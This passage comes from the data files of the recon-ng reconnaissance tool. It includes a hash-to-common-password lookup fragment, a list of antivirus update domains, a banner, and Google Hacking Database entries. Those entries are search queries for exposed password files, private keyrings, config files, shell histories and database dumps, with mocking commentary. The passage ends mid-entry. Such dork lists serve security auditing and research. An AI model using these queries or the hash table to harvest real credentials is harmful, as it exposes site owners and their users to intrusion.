"blackhaw", "974c2f7c19034293": "butterfl", "0433785b389948ba": "123qweas", "025fea72dac592b3": "grandkid", "78eb2b6dc5bf3de4": "abcd1234", "f988e83e219e0fe6": "armstron", "e2a311ba09ab4707": "", "bcd9cb2857053d6f": "5", "ba4c7311c5d4e8fc": "1234", "00b712d721fd86d7": "anniebab", "e8c35bdb06db99fc": "i", "231da357ac827cb2": "11", "dd2b8406bd9bdf75": "d", "020516a2759c63a5": "majorpai", "041e1ee97f9bdb12": "adobe123", "02dc4e7e85ff2425": "10", "257928d964ab73ab": "pepper", "349dab2c617b1cd4": "summer20", "29fab4c275192681": "bismilla", "ccad5c1d5026b6dc": "tottenha", "629b2693a0174139": "654321", "ba71d0520aa97f51": "3", "0038f79b495977c7": "madison1", "5aae3bad9a61b777": "manchest", "8fb33545668d4682": "ia", "5404e3efcec0d87a": "nicole", "4c0ae00ced1d1228": "spiderma", "ae46a43c557bc156": "designer", "3321413b6616f81c": "jessica", "f8dae44c085732f8": "rotterda", "b96016470dfc4aa5": "f", "f6373dcf5d8794ac": "swordfis", "da10f59e62549a1d": "asdfasdf", "f35c23fe37810fbd": "g", "c1029639a5e2e5e0": "buster", "e6746ec4e1bdfc7a": "master", "e8a25bbe9d4918a6": "purple", "00ea0fb814b6bc23": "kittykat", "ed9eae332abd6e9c": "dreamwea", "00a514abd9f84b91": "tinykitt", "216f62b892da33b8": "blablabl", "821aef93009c5f86": "jennifer", "0edb3c9258254d00": "computer", "97ac85e90198911d": "6", "c83d686344d3705c": "carpedie", "17d9ea058c762e10": "asdfghj", "5955588de3e39d7e": "freedom", "bf471e7cf1f638b2": "123654", "79c5ba23211e9a49": "football", "96056a9845a0440d": "november", "cbb17a0b253254cf": "superman", "56a8add4654b2de9": "welcome", "e1c843599808eefd": "753951", "e701002271f6da2e": "adobe1", "01fd05003a75d26f": "redcherr", "a4255de7da857b05": "1q2w3e", "27a1f083b521a4a3": "335", "6b8dc1bc78be1854": "gibsones", "00908101f310aeec": "nimajneb", "aa30330aea89821c": "1983", "adfa9846907e7a52": "juliawei", "b8f74a29577fe506": "eric_db0", "4de78af47ba9959f": "lawson01", "d796d3ea07aa8e45": "tanner1", "1f89e8d9bc5888ce": "spyhunte", "7505d8e6533fe2c2": "bull7390", "64dea46fe1421972": "ruffiny8", "50400338531504d1": "toospiff", "b0ba0dbd5bdb313b": "trialadd", "71857c9a14843b94": "trombly8", "6e34a9e0bfa7fc21": "jijojeri", "a6ddca4141622128": "passport", "179cc3af5bf32e20": "libmfglt", "5c734fe3c50c0a14": "megmeg22", "54901cf4882b62af": "piedpipe", "18765c1270be27b1": "bre1767", "f4322feeb323850d": "ren69020", "35eb1dcde8af4331": "bonzo4ev", "322f6b8893b48dfb": "mackinas", "95c837cafd399bf8": "lfreedma", "f47b233da6d5368c": "elhadi10", "c60ddab708f89095": "jerry983", "43a9e72f5c13e191": "images", "e22d6790ac401fd0": "verity94" }LaNMaSteR53-recon-ng-70d967e3f530/data/av_domains.lst000066400000000000000000000014621312265724400217340ustar00rootroot00000000000000www.es-latest-3.sophos.com/update www.es-web.sophos.com www.es-web.sophos.com.edgesuite.net www.es-web-2.sophos.com www.es-web-2.sophos.com.edgesuite.net www.dnl-01.geo.kaspersky.com www.downloads2.kaspersky-labs.com www.liveupdate.symantecliveupdate.com www.liveupdate.symantec.com www.update.symantec.com www.update.nai.com www.download797.avast.com www.guru.avg.com www.osce8-p.activeupdate.trendmicro.com www.forefrontdl.microsoft.com es-latest-3.sophos.com/update es-web.sophos.com es-web.sophos.com.edgesuite.net es-web-2.sophos.com es-web-2.sophos.com.edgesuite.net dnl-01.geo.kaspersky.com downloads2.kaspersky-labs.com liveupdate.symantecliveupdate.com liveupdate.symantec.com update.symantec.com update.nai.com download797.avast.com guru.avg.com osce8-p.activeupdate.trendmicro.com forefrontdl.microsoft.com LaNMaSteR53-recon-ng-70d967e3f530/data/banner.txt000066400000000000000000000016521312265724400210770ustar00rootroot00000000000000 _/_/_/ _/_/_/_/ _/_/_/ _/_/_/ _/ _/ _/ _/ _/_/_/ _/ _/ _/ _/ _/ _/ _/_/ _/ _/_/ _/ _/ _/_/_/ _/_/_/ _/ _/ _/ _/ _/ _/ _/_/_/_/ _/ _/ _/ _/ _/_/_/ _/ _/ _/ _/ _/ _/ _/ _/_/ _/ _/_/ _/ _/ _/ _/ _/_/_/_/ _/_/_/ _/_/_/ _/ _/ _/ _/ _/_/_/ /\ / \\ /\ Sponsored by... /\ /\/ \\V \/\ / \\/ // \\\\\ \\ \/\ // // BLACK HILLS \/ \\ www.blackhillsinfosec.com LaNMaSteR53-recon-ng-70d967e3f530/data/ghdb.json000066400000000000000000102606501312265724400206760ustar00rootroot00000000000000[ { "signatureReferenceNumber": "1", "link": "https://www.exploit-db.com/ghdb/1/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=%22cacheserverreport+for%22+%22This+analysis+was+produced+by+calamaris%22", "shortDescription": "squid cache server reports", "textualDescription": "These are squid server cache reports. Fairly benign, really except when you consider using them for evil purposes. For example, an institution stands up a proxy server for their internal users to get to the outside world. Then, the internal user surf all over to their hearts content (including intranet pages cuz well, the admins are stupid) Voila, intranet links show up in the external cache report. Want to make matters worse for yourself as an admin? OK, configure your external proxy server as a trusted internal host. Load up your web browser, set your proxy as their proxy and surf your way into their intranet. Not that I've noticed any examples of this in this google list. *COUGH* *COUGH* *COUGH* unresolved DNS lookups give clues *COUGH* *COUGH* ('scuse me. must be a furball) OK, lets say BEST CASE scenario. Let's say there's not security problems revealed in these logs. Best case scenario is that outsiders can see what your company/agency/workers are surfing." }, { "signatureReferenceNumber": "2", "link": "https://www.exploit-db.com/ghdb/2/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Ganglia%22+%22Cluster+Report+for%22", "shortDescription": "Ganglia Cluster Reports", "textualDescription": "These are server cluster reports, great for info gathering. Lesse, what were those server names again?" }, { "signatureReferenceNumber": "3", "link": "https://www.exploit-db.com/ghdb/3/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+dbconvert%2Eexe+chats", "shortDescription": "ICQ chat logs, please...", "textualDescription": "ICQ (http://www.icq.com) allows you to store the contents of your online chats into a file. These folks have their entire ICQ directories online. On purpose?" }, { "signatureReferenceNumber": "4", "link": "https://www.exploit-db.com/ghdb/4/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Apache+HTTP+Server%22+intitle%3A%22documentation%22", "shortDescription": "Apache online documentation", "textualDescription": "When you install the Apache web server, you get a nice set of online documentation. When you learn how to use Apache, your supposed to delete these online Apache manuals. These sites didn't. If they're in such a hurry with Apache installs, I wonder what else they rushed through?" }, { "signatureReferenceNumber": "5", "link": "https://www.exploit-db.com/ghdb/5/", "category": "Error Messages", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22Error+Diagnostic+Information%22+intitle%3A%22Error+Occurred+While%22+", "shortDescription": "Coldfusion Error Pages", "textualDescription": "These aren't too horribly bad, but there are SO MANY of them. These sites got googlebotted while the site was having \"technical difficulties.\" The resulting cached error message gives lots of juicy tidbits about the target site." }, { "signatureReferenceNumber": "6", "link": "https://www.exploit-db.com/ghdb/6/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+finance.xls", "shortDescription": "Financial spreadsheets: finance.xls", "textualDescription": "\"Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!\"" }, { "signatureReferenceNumber": "7", "link": "https://www.exploit-db.com/ghdb/7/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+finances.xls", "shortDescription": "Financial spreadsheets: finances.xls", "textualDescription": "\"Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!\"" }, { "signatureReferenceNumber": "8", "link": "https://www.exploit-db.com/ghdb/8/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22%23+Dumping+data+for+table%22", "shortDescription": "sQL data dumps", "textualDescription": "sQL database dumps. LOTS of data in these. So much data, infact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper....." }, { "signatureReferenceNumber": "9", "link": "https://www.exploit-db.com/ghdb/9/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+%2Ebash%5Fhistory", "shortDescription": "bash_history files", "textualDescription": "Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations..." }, { "signatureReferenceNumber": "10", "link": "https://www.exploit-db.com/ghdb/10/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+.sh_history", "shortDescription": "sh_history files", "textualDescription": "Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations..." }, { "signatureReferenceNumber": "11", "link": "https://www.exploit-db.com/ghdb/11/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+%2Emysql%5Fhistory", "shortDescription": "mysql history files", "textualDescription": "The .mysql_history file contains commands that were performed against a mysql database. A \"history\" of said commands. First, you shouldn't show this file to anyone, especially not a MAJOR SEARCH ENGINE! Secondly, I sure hope you wouldn't type anything sensitive while interacting with your databases, like oh say USERNAMES AND PASSWORDS..." }, { "signatureReferenceNumber": "12", "link": "https://www.exploit-db.com/ghdb/12/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+mt%2Ddb%2Dpass%2Ecgi", "shortDescription": "mt-db-pass.cgi files", "textualDescription": "These folks had the technical prowess to unpack the movable type files, but couldn't manage to set up their web servers properly. Check the mt.cfg files for interesting stuffs..." }, { "signatureReferenceNumber": "13", "link": "https://www.exploit-db.com/ghdb/13/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle:%22Welcome+to+Windows+2000+Internet+Services%22&num=100&hl=en&lr=&ie=UTF-8&filter=0", "shortDescription": "Windows 2000 Internet Services", "textualDescription": "At first glance, this search reveals even more examples of operating system users enabling the operating system default web server software. This is generally accepted to be a Bad Idea(TM) as mentioned in the previous example. However, the googleDork index on this particular category gets quite a boost from the fact that this particular screen should NEVER be seen by the general public. To quote the default index screen: \"Any users attempting to connect to this site are currently receiving an 'Under Construction page'\" THIS is not the 'Under Construction page.' I was only able to generate this screen while sitting at the console of the server. The fact that this screen is revealed to the general public may indicate a misconfiguration of a much more insidious nature..." }, { "signatureReferenceNumber": "14", "link": "https://www.exploit-db.com/ghdb/14/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle:%22Welcome+to+IIS+4.0%22&num=100&hl=en&lr=&ie=UTF-8&filter=0", "shortDescription": "IIS 4.0", "textualDescription": "Moving from personal, lightweight web servers into more production-ready software, we find that even administrators of Microsoft's Internet Information Server (IIS) sometimes don't have a clue what they're doing. By searching on web pages with titles of \"Welcome to IIS 4.0\" we find that even if they've taken the time to change their main page, some dorks forget to change the titles of their default-installed web pages. This is an indicator that their web server is most likely running, or was upgraded from, the now considered OLD IIS 4.0 and that at least portions of their main pages are still exactly the same as they were out of the box. Conclusion? The rest of the factory-installed stuff is most likely lingering around on these servers as well. Old code: FREE with operating system.Poor content management: an average of $40/hour. Factory-installed default scripts: FREE with operating system.Getting hacked by a script kiddie that found you on Google: PRICELESS.For all the things money can't buy, there's a googleDork award." }, { "signatureReferenceNumber": "15", "link": "https://www.exploit-db.com/ghdb/15/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=%22Index+of+/backup%22&num=100&hl=en&lr=&ie=UTF-8&filter=0", "shortDescription": "Look in my backup directories! Please?", "textualDescription": "Backup directories are often very interesting places to explore. More than one server has been compromised by a hacker's discovery of sensitive information contained in backup files or directories. Some of the sites in this search meant to reveal the contents of their backup directories, others did not. Think about it. What.s in YOUR backup directories? Would you care to share the contents with the whole of the online world? Probably not. Whether intentional or not, bsp.gsa.gov reveals backup directory through Google. Is this simply yet another misconfigured .gov site? You decide. BSP stands for \"best security practices,\" winning this site the Top GoogleDork award for this category." }, { "signatureReferenceNumber": "16", "link": "https://www.exploit-db.com/ghdb/16/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?sourceid=navclient&q=%22powered+by+openbsd%22+%2B%22powered+by+apache%22", "shortDescription": "OpenBSD running Apache", "textualDescription": "I like the OpenBSD operating system. I really do. And I like the Apache web server software. Honestly. I admire the mettle of administrators who take the time to run quality, secure software. The problem is that you never know when security problems will pop up. A BIG security problem popped up within the OpenBSD/Apache combo back in the day.Now, every administrator that advertised this particular combo with cute little banners has a problem. Hackers can find them with Google. I go easy on these folks since the odds are they.ve patched their sites already. Then again, they may just show up on zone-h.." }, { "signatureReferenceNumber": "17", "link": "https://www.exploit-db.com/ghdb/17/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intitle:index.of+intext:%22secring.skr%22%7C%22secring.pgp%22%7C%22secring.bak%22", "shortDescription": "intitle:index.of intext:\"secring.skr\"|\"secring.pgp\"|\"secring.bak\"", "textualDescription": "PGP is a great encryption technology. It keeps secrets safe. Everyone from drug lords to the head of the DEA can download PGP to encrypt their sensitive documents. Everyone, that is except googleDorks. GoogleDorks, it seems, don't understand that anyone in possession of your private keyring (secring) can get to your secret stuff. It should noever be given out, and should certainly not be posted on the Internet. The highest ranking is awarded for this surprising level of ineptitude." }, { "signatureReferenceNumber": "18", "link": "https://www.exploit-db.com/ghdb/18/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?sourceid=navclient&q=intitle%3A%22Index+of%22+%22people%2Elst%22", "shortDescription": "people.lst", "textualDescription": "*sigh*" }, { "signatureReferenceNumber": "19", "link": "https://www.exploit-db.com/ghdb/19/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=intitle%3A%22Index+of%22+passwd+passwd.bak", "shortDescription": "passwd", "textualDescription": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show \"passwd\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!" }, { "signatureReferenceNumber": "20", "link": "https://www.exploit-db.com/ghdb/20/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?sourceid=navclient&q=intitle%3A%22Index+of%22+master%2Epasswd", "shortDescription": "master.passwd", "textualDescription": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show \"master.passwd\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!For master.passwd, be sure to check other files in the same directory..." }, { "signatureReferenceNumber": "21", "link": "https://www.exploit-db.com/ghdb/21/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?sourceid=navclient&q=intitle%3A%22Index+of%22+pwd%2Edb", "shortDescription": "pwd.db", "textualDescription": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The his in this search show \"pwd.db\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!" }, { "signatureReferenceNumber": "22", "link": "https://www.exploit-db.com/ghdb/22/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=intitle%3A%22Index+of%22+%22.htpasswd%22+htpasswd.bak", "shortDescription": "htpasswd / htpasswd.bak", "textualDescription": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!" }, { "signatureReferenceNumber": "23", "link": "https://www.exploit-db.com/ghdb/23/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intitle:%22Index+of%22+%22.htpasswd%22+%22htgroup%22++-intitle:%22dist%22+-apache+-htpasswd.c&hl=en&lr=&ie=UTF-8&safe=off&start=10&sa=N", "shortDescription": "htpasswd / htgroup", "textualDescription": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!You'll need to sift through these results a bit..." }, { "signatureReferenceNumber": "24", "link": "https://www.exploit-db.com/ghdb/24/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intitle:%22Index+of%22+spwd.db+passwd+-pam.conf&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=10&sa=N", "shortDescription": "spwd.db / passwd", "textualDescription": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!" }, { "signatureReferenceNumber": "25", "link": "https://www.exploit-db.com/ghdb/25/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=intitle%3A%22Index+of..etc%22+passwd", "shortDescription": "passwd / etc (reliable)", "textualDescription": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!" }, { "signatureReferenceNumber": "26", "link": "https://www.exploit-db.com/ghdb/26/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=buddylist%2Eblt", "shortDescription": "AIM buddy lists", "textualDescription": "These searches bring up common names for AOL Instant Messenger \"buddylists\". These lists contain screen names of your \"online buddies\" in Instant Messenger. Not that's not too terribly exciting or stupid unless you want to mess with someone's mind, and besides, some people make these public on purpose. The thing that's interesting are the files that get stored ALONG WITH buddylists. Often this stuff includes downloaded pictures, resumes, all sorts of things. This is really for the peepers out there, and it' possible to spend countless hours rifling through people's personal crap. Also try buddylist.blt, buddy.blt, buddies.blt." }, { "signatureReferenceNumber": "27", "link": "https://www.exploit-db.com/ghdb/27/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?sourceid=navclient&q=intitle%3A%22Index+of%22+config%2Ephp", "shortDescription": "config.php", "textualDescription": "This search brings up sites with \"config.php\" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. Way to go, googleDorks!!" }, { "signatureReferenceNumber": "28", "link": "https://www.exploit-db.com/ghdb/28/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=intitle%3Aphpinfo+%22PHP+Version%22&btnG=Search", "shortDescription": "phpinfo()", "textualDescription": "this brings up sites with phpinfo(). There is SO much cool stuff in here that you just have to check one out for yourself! I mean full blown system versioning, SSL version, sendmail version and path, ftp, LDAP, SQL info, Apache mods, Apache env vars, *sigh* the list goes on and on! Thanks \"joe!\" =)" }, { "signatureReferenceNumber": "29", "link": "https://www.exploit-db.com/ghdb/29/", "category": "Error Messages", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=ISO-8859-1&q=%22supplied+argument+is+not+a+valid+MySQL+result+resource%22", "shortDescription": "MYSQL error message: supplied argument....", "textualDescription": "One of many potential error messages that spew interesting information. The results of this message give you real path names inside the webserver as well as more php scripts for potential \"crawling\" activities." }, { "signatureReferenceNumber": "30", "link": "https://www.exploit-db.com/ghdb/30/", "category": "Vulnerable Files", "querystring": null, "shortDescription": "The Master List", "textualDescription": "CLick on any of the following links to show google's list!_vti_inf.html (694 hits)service.pwd (11,800 hits)users.pwd (23 hits)authors.pwd (22 hits)administrators.pwd (22 hits)shtml.dll (780 hits)shtml.exe (761 hits)fpcount.exe (1,370 hits)default.asp (2,170 hits)showcode.asp (4 hits)sendmail.cfm (5 hits)getFile.cfm (7 hits)imagemap.exe (510 hits)test.bat (353 hits)msadcs.dll (8 hits)htimage.exe (513 hits)counter.exe (164 hits)browser.inc (11 hits)hello.bat (18 hits)default.asp\\\\ (2,170 hits)dvwssr.dll (571 hits)dvwssr.dll (571 hits)dvwssr.dll (571 hits)cart32.exe (9 hits)add.exe (38 hits)index.JSP (998 hits)index.jsp (998 hits)SessionServlet (46 hits)shtml.dll (780 hits)index.cfm (473 hits)page.cfm (5 hits)shtml.exe (761 hits)web_store.cgi (16 hits)shop.cgi (63 hits)upload.asp (27 hits)default.asp (2,170 hits)pbserver.dll (6 hits)phf (370 hits)test-cgi (1,560 hits)finger (23,900 hits)Count.cgi (8,710 hits)jj (5,600 hits)php.cgi (170 hits)php (48,000 hits)nph-test-cgi (132 hits)handler (9,220 hits)webdist.cgi (35 hits)webgais (37 hits)websendmail (12 hits)faxsurvey (27 hits)htmlscript (50 hits)perl.exe (340 hits)wwwboard.pl (455 hits)www-sql (26,500 hits)view-source (641 hits)campas (94 hits)aglimpse (12 hits)glimpse (4,530 hits)man.sh (127 hits)AT-admin.cgi (789 hits)AT-generate.cgi (14 hits)filemail.pl (5 hits)maillist.pl (16 hits)info2www (737 hits)files.pl (267 hits)bnbform.cgi (91 hits)survey.cgi (93 hits)classifieds.cgi (25 hits)wrap (14,000 hits)cgiwrap (1,270 hits)edit.pl (114 hits)perl (80,700 hits)names.nsf (12 hits)webgais (37 hits)dumpenv.pl (7 hits)test.cgi (1,560 hits)submit.cgi (79 hits)submit.cgi (79 hits)guestbook.cgi (528 hits)guestbook.pl (451 hits)cachemgr.cgi (25 hits)responder.cgi (4 hits)perlshop.cgi (30 hits)query (15,500 hits)w3-msql (877 hits)plusmail (12 hits)htsearch (177 hits)infosrch.cgi (19 hits)publisher (2,610 hits)ultraboard.cgi (24 hits)db.cgi (96 hits)formmail.cgi (420 hits)allmanage.pl (5 hits)ssi (9,550 hits)adpassword.txt (39 hits)redirect.cgi (60 hits)f (124,000 hits)cvsweb.cgi (78 hits)login.jsp (241 hits)login.jsp (241 hits)dbconnect.inc (18 hits)admin (57,000 hits)htgrep (30 hits)wais.pl (133 hits)amadmin.pl (14 hits)subscribe.pl (65 hits)news.cgi (387 hits)auctionweaver.pl (2 hits).htpasswd (2,390 hits)acid_main.php (3 hits)access_log (1,250 hits)access-log (618 hits)access.log (618 hits)log.htm (386 hits)log.html (1,310 hits)log.txt (987 hits)logfile (23,200 hits)logfile.htm (76 hits)logfile.html (671 hits)logfile.txt (701 hits)logger.html (37 hits)stat.htm (398 hits)stats.htm (687 hits)stats.html (1,840 hits)stats.txt (342 hits)webaccess.htm (11 hits)wwwstats.html (80 hits)source.asp (11 hits)perl (80,700 hits)mailto.cgi (46 hits)YaBB.pl (35 hits)mailform.pl (670 hits)cached_feed.cgi (6 hits)cr (27,500 hits)global.cgi (14 hits)Search.pl (548 hits)build.cgi (74 hits)common.php (184 hits)common.php (184 hits)show (33,500 hits)global.inc (114 hits)ad.cgi (21 hits)WSFTP.LOG (11 hits)index.html~ (81,100 hits)index.php~ (6,740 hits)index.html.bak (690 hits)index.php.bak (69 hits)print.cgi (61 hits)register.cgi (172 hits)webdriver (35 hits)bbs_forum.cgi (45 hits)mysql.class (21 hits)sendmail.inc (97 hits)CrazyWWWBoard.cgi (68 hits)search.pl (548 hits)way-board.cgi (44 hits)webpage.cgi (89 hits)pwd.dat (22 hits)adcycle (12 hits)post-query (240 hits)help.cgi (69 hits)" }, { "signatureReferenceNumber": "31", "link": "https://www.exploit-db.com/ghdb/31/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:Index.of+robots.txt&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=10&sa=N", "shortDescription": "robots.txt", "textualDescription": "The robots.txt file contains \"rules\" about where web spiders are allowed (and NOT allowed) to look in a website's directory structure. Without over-complicating things, this means that the robots.txt file gives a mini-roadmap of what's somewhat public and what's considered more private on a web site. Have a look at the robots.txt file itself, it contains interesting stuff.However, don't forget to check out the other files in these directories since they are usually at the top directory level of the web server!" }, { "signatureReferenceNumber": "32", "link": "https://www.exploit-db.com/ghdb/32/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=intitle%3Aindex.of+passlist", "shortDescription": "passlist", "textualDescription": "I'm not sure what uses this, but the passlist and passlist.txt files contain passwords in CLEARTEXT! That's right, no decoding/decrypting/encrypting required. How easy is this?*sigh*Supreme googledorkage" }, { "signatureReferenceNumber": "33", "link": "https://www.exploit-db.com/ghdb/33/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:index.of.secret&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=0&sa=N", "shortDescription": "secret", "textualDescription": "What kinds of goodies lurk in directories marked as \"secret?\" Find out..." }, { "signatureReferenceNumber": "34", "link": "https://www.exploit-db.com/ghdb/34/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex%2Eof%2Eprivate", "shortDescription": "private", "textualDescription": "What kinds of things might you find in directories marked \"private?\" let's find out...." }, { "signatureReferenceNumber": "35", "link": "https://www.exploit-db.com/ghdb/35/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=intitle%3Aindex.of.etc", "shortDescription": "etc (index.of)", "textualDescription": "This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!" }, { "signatureReferenceNumber": "36", "link": "https://www.exploit-db.com/ghdb/36/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=intitle%3Aindex.of.winnt", "shortDescription": "winnt", "textualDescription": "The \\WINNT directory is the directory that Windows NT is installed into by default. Now just because google can find them, this doesn't necessarily mean that these are Windows NT directories that made their way onto the web. However, sometimes this happens. Other times, they aren't Windows NT directories, but backup directories for Windows NT data. Wither way, worthy of a nomination." }, { "signatureReferenceNumber": "37", "link": "https://www.exploit-db.com/ghdb/37/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:%22index.of.secure%22&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=0&sa=N", "shortDescription": "secure", "textualDescription": "What could be hiding in directories marked as \"secure?\" let's find out..." }, { "signatureReferenceNumber": "38", "link": "https://www.exploit-db.com/ghdb/38/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=inurl%3Aindex.of.protected&btnG=Google+Search", "shortDescription": "protected", "textualDescription": "What could be in a directory marked as \"protected?\" Let's find out..." }, { "signatureReferenceNumber": "39", "link": "https://www.exploit-db.com/ghdb/39/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:index.of.password&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=0&sa=N", "shortDescription": "index.of.password", "textualDescription": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn..." }, { "signatureReferenceNumber": "40", "link": "https://www.exploit-db.com/ghdb/40/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22This+report+was+generated+by+WebLog%22", "shortDescription": "\"This report was generated by WebLog\"", "textualDescription": "These are weblog-generated statistics for web sites... A roadmap of files, referrers, errors, statistics... yummy... a schmorgasbord! =P" }, { "signatureReferenceNumber": "41", "link": "https://www.exploit-db.com/ghdb/41/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22These+statistics+were+produced+by+getstats%22", "shortDescription": "\"produced by getstats\"", "textualDescription": "Another web statistics package. This one originated from a google scan of an ivy league college. *sigh*There's sooo much stuff in here!" }, { "signatureReferenceNumber": "42", "link": "https://www.exploit-db.com/ghdb/42/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22This+summary+was+generated+by+wwwstat%22", "shortDescription": "\"generated by wwwstat\"", "textualDescription": "More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. lots os good stuff.You know, these are SOOO 